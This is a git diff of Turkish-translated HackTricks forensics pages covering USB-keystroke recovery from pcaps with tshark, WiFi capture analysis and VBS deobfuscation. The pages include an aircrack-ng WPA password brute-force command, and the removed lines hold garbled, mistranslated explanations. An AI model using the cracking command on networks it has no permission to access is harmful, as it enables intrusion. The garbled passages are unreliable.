Bu tür bir Wireshark filtresi işe yarar olabilir: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
"02" ile başlayan verilerin shift tuşuyla basıldığını bilmek önemli olabilir.
"02" ile başlayan verilerin shift tuşu kullanılarak basıldığını bilmek önemli olabilir.
Daha fazla bilgiyi okuyabilir ve bunu nasıl analiz edeceğinize dair bazı betikler bulabilirsiniz:
Bu konuda daha fazla bilgi edinmek ve bazı betikler bulmak için şu kaynaklara bakabilirsiniz:
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,43 +1,44 @@
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** isterseniz [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
Eğer aşağıdaki gibi bir klavyenin USB üzerinden iletişimini içeren bir pcap'e sahipseniz:
Eğer bir klavyenin USB üzerinden iletişim içeren bir pcap dosyanız varsa ve aşağıdaki gibi görünüyorsa:
![](<../../../.gitbook/assets/image (613).png>)
İletişimde neyin yazıldığını öğrenmek için [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) aracını kullanabilirsiniz:
İletişimde yazılanları almak için [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) aracını kullanabilirsiniz:
```bash
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
python3 usbkeyboard.py ./keystrokes.txt
```
Bu konuyla ilgili daha fazla bilgi edinebilir ve analiz etmek için bazı komut dosyaları bulabilirsiniz:
Aşağıdaki bağlantılardan daha fazla bilgiyi okuyabilir ve analiz etmek için bazı betikler bulabilirsiniz:
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
* [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{% hint style="success" %}
AWS Hacking'ini öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ini öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin</strong>!</summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'lar göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,21 +1,21 @@
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}
# BSSID'leri Kontrol Edin
# BSSID'leri Kontrol Et
WireShark kullanarak Wifi trafiğinin olduğu bir yakalamayı aldığınızda, yakalamadaki tüm SSID'leri araştırmaya başlayabilirsiniz: _Wireless --> WLAN Traffic_:
WireShark kullanarak Wifi trafiğinin temel olduğu bir yakalama aldığınızda, yakalamadaki tüm SSID'leri araştırmaya başlayabilirsiniz: _Wireless --> WLAN Traffic_:
![](<../../../.gitbook/assets/image (424).png>)
@ -23,46 +23,26 @@ WireShark kullanarak Wifi trafiğinin olduğu bir yakalamayı aldığınızda, y
## Brute Force
Bu ekranın sütunlarından biri, yakalamada **herhangi bir kimlik doğrulama bulunup bulunmadığını** gösterir. Eğer durum buysa, `aircrack-ng` kullanarak Brute Force deneyebilirsiniz:
O ekranın sütunlarından biri, **pcap içinde herhangi bir kimlik doğrulamasının bulunup bulunmadığını** gösterir. Eğer durum buysa, `aircrack-ng` kullanarak Brute Force deneyebilirsiniz:
```bash
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
```
Örneğin, daha sonra trafiği şifrelemek için gereken bir PSK'yı (pre shared-key) koruyan WPA parolasını alacaktır.
# Veri Paketlerinde / Yan Kanalda
# Beacon / Yan Kanal Verileri
Eğer **verinin bir Wifi ağı beacons içinde sızdırıldığını** şüpheleniyorsanız, ağın beacons'larını aşağıdaki gibi bir filtre kullanarak kontrol edebilirsiniz: `wlan contains <AĞINADI>`, veya `wlan.ssid == "AĞINADI"` filtrelenmiş paketler içinde şüpheli dizeler arayın.
Eğer **bir Wifi ağındaki verilerin beaconlarda sızdırıldığını** düşünüyorsanız, ağın beaconlarını aşağıdaki gibi bir filtreyi kullanarak kontrol edebilirsiniz: `wlan contains <AĞINADI>`, veya `wlan.ssid == "AĞINADI"` filtrelenmiş paketler içinde şüpheli dizeleri arayın.
# Bir Wifi Ağındaki Bilinmeyen MAC Adreslerini Bulma
# Bilinmeyen MAC Adreslerini Bir Wifi Ağından Bulma
Aşağıdaki bağlantı, **bir Wifi Ağı içinde veri gönderen makineleri bulmak** için faydalı olacaktır:
Aşağıdaki bağlantı **bir Wifi Ağı içinde veri gönderen makineleri bulmak için** faydalı olacaktır:
* `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
Eğer **MAC adreslerini zaten biliyorsanız, çıktıdan çıkarabilirsiniz** ve şu gibi kontroller ekleyebilirsiniz: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
Eğer zaten **MAC adreslerini biliyorsanız, çıktıdan onları çıkarabilirsiniz** ve aşağıdaki gibi kontroller ekleyebilirsiniz: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
Ağ içinde iletişim kuran **bilinmeyen MAC** adreslerini tespit ettikten sonra, trafiğini filtrelemek için aşağıdaki gibi **filtreler** kullanabilirsiniz: `wlan.addr==<MAC adresi> && (ftp || http || ssh || telnet)`. Unutmayın ki ftp/http/ssh/telnet filtreleri, trafiği şifre çözdüyseniz faydalı olacaktır.
Bir kez **bilinmeyen MAC** adreslerini ağ içinde iletişim halinde tespit ettikten sonra, aşağıdaki gibi **filtreler** kullanabilirsiniz: `wlan.addr==<MAC adresi> && (ftp || http || ssh || telnet)` trafiğini filtrelemek için. Unutmayın ki ftp/http/ssh/telnet filtreleri trafiği şifrelediyseniz faydalı olacaktır.
# Trafik Şifrelemek
# Trafik Şifrelemesi
Düzenle --> Tercihler --> Protokoller --> IEEE 802.11--> Düzenle
![](<../../../.gitbook/assets/image (426).png>)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
</details>

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
İşte belirli dosya türleri ve/veya yazılımlar için ilginç hileler bulabilirsiniz:
İşte belirli dosya türleri ve/veya yazılımlar için ilginç püf noktalarını bulabileceğiniz yerler:
{% page-ref page=".pyc.md" %}
@ -37,16 +38,17 @@ HackTricks'ı desteklemenin diğer yolları:
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,80 +1,46 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerinizi sıfırdan kahraman seviyesine çıkarın</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimizden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
Bir kötü amaçlı VBS dosyasını hata ayıklamak/deşifre etmek için faydalı olabilecek bazı şeyler:
Bir kötü amaçlı VBS dosyasını hata ayıklamak/deobfuscate etmek için faydalı olabilecek bazı şeyler:
## echo
```bash
Wscript.Echo "Like this?"
```
## Yorumlar
Yorumlar, bir VBS dosyasının içindeki kodun anlaşılmasını kolaylaştırmak için kullanılabilir. Yorumlar, kodun ne yaptığınııklamak veya belirli bir bölümü devre dışı bırakmak için kullanılabilir. VBS dosyalarında iki tür yorum bulunur: tek satır yorumları ve çok satırlı yorumlar.
### Tek Satır Yorumları
Tek satır yorumları, bir satırın sonuna eklenen bir tane tek tırnak işareti (') ile başlar. Bu işaretten sonra gelen her şey yorum olarak kabul edilir ve çalıştırılmaz.
Örnek:
```vbs
MsgBox "Bu kod çalışacak" ' Bu bir yorumdur ve çalıştırılmayacak
```
### Çok Satırlı Yorumlar
Çok satırlı yorumlar, bir tane tek tırnak işareti ile başlar ve bir tane daha tek tırnak işareti ile sona erer. İçerisindeki tüm satırlar yorum olarak kabul edilir ve çalıştırılmaz.
Örnek:
```vbs
' Bu bir çok satırlı yorumdur ve çalıştırılmayacak
' MsgBox "Bu kod çalışmayacak"
' WScript.Echo "Bu kod da çalışmayacak"
```
Yorumlar, VBS dosyalarında kodun anlaşılmasını ve düzenlenmesini kolaylaştırır. Ayrıca, belirli bir kod bloğunu geçici olarak devre dışı bırakmak veya kodun ne yaptığınııklamak için kullanılabilir.
```bash
' this is a comment
```
## Test
Bu bir testtir.
Aşağıdaki adımları izleyerek VBS dosyalarını deobfuscate etmek için cscript.exe'yi kullanabilirsiniz:
1. **Komutu Çalıştırın:**
```bash
cscript.exe <obfuscated_script.vbs> //NoLogo
```
2. **Çıktıyı Yakalayın:**
Obfuscated VBS dosyasını cscript.exe ile çalıştırdıktan sonra çıktıyı yakalayın. Bu çıktı, deobfuscated VBS scriptini içerecektir.
3. **Deobfuscated Scripti Kullanın:**
Elde ettiğiniz deobfuscated scripti analiz etmek veya gerektiğinde başka işlemler için kullanmak üzere kaydedin.
```bash
cscript.exe file.vbs
```
## Bir dosyaya veri yazma
To write data to a file, you can use the following steps:
1. Open the file in write mode. You can specify the file path and name.
```python
file = open("dosya.txt", "w")
```
2. Write the data to the file using the `write()` method. You can pass a string as an argument.
```python
file.write("Merhaba, dünya!")
```
3. Close the file to ensure that all the data is saved.
```python
file.close()
```
By following these steps, you will be able to write data to a file in Python.
```js
Function writeBinary(strBinary, strPath)
@ -99,16 +65,17 @@ End With
End Function
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,33 +1,20 @@
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>
**PNG dosyaları**, **CTF zorlukları** için **kayıpsız sıkıştırma** özellikleri nedeniyle yüksek saygı görür ve gizli verilerin gömülmesi için idealdir. **Wireshark** gibi araçlar, PNG dosyalarının ağ paketleri içindeki verilerini analiz ederek gömülü bilgileri veya anormallikleri ortaya çıkarır.
